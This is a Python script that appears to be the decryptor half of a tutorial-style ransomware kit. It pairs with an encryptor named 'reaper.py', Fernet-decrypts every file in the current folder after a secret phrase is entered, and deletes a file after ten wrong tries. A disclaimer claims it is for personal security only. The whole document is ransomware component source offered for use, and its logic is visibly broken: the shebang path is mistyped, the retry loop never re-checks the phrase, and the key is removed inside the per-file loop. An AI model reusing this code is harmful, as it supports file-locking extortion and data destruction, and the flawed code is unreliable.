#!/usb/bin/env python3
# Code Originated from networkchuck on youtube : https://www.youtube.com/watch?v=UtMMjXOlRQc
# To use for only personal security not for any criminal activity
# I do not take charges for how you use the code


import os
import time
from cryptography.fernet import Fernet


# Put your file name that you want to decrpyt
files_enc = ""
thegoldenkey = "thekey.key"
i = 0
y = 10
files = []

for file in os.listdir():
	if file == "reaper.py" or file == "thekey.key" or file == "decrypt.py":
		continue
	if os.path.isfile(file):
		files.append(file)

print(files)


with open("thekey.key", "rb") as key:
	secretkey = key.read()

secretphrase = ""

user_phrase = input("Enter the secret phrase to decrypt your files\n")

if user_phrase == secretphrase :
	for file in files:
		with open(file, "rb") as thefile:
			contents = thefile.read()
		contents_decrypted = Fernet(secretkey).decrypt(contents)
		with open(file, "wb") as thefile:
			thefile.write(contents_decrypted)
		print("Files Decrypted")
		os.remove(thegoldenkey)
		
else :
	print("Wrong Phrase try left : 10")
	user_phrase = input("Enter the secret phrase to decrypt your files\n")
	while i < 9:
		i += 1
		y -= 1
		print("Wrong Phrase, try left :", y)
		user_phrase = input("Enter the secret phrase to decrypt your files\n")
		if i == 9:
			os.remove(files_enc)
			print("//\\")
			time.sleep(0.5)
			print("\\//")
			time.sleep(0.5)
			print("//\\")
			time.sleep(0.5)
			print("\\//")
			time.sleep(0.5)
			print("//\\")
			time.sleep(0.5)
			print("\\//")
			print("𝙁𝙞𝙡𝙚 𝘿𝙚𝙡𝙚𝙩𝙚𝙙 𝙛𝙤𝙧 𝙨𝙖𝙛𝙚𝙩𝙮")
		else:
	    		pass

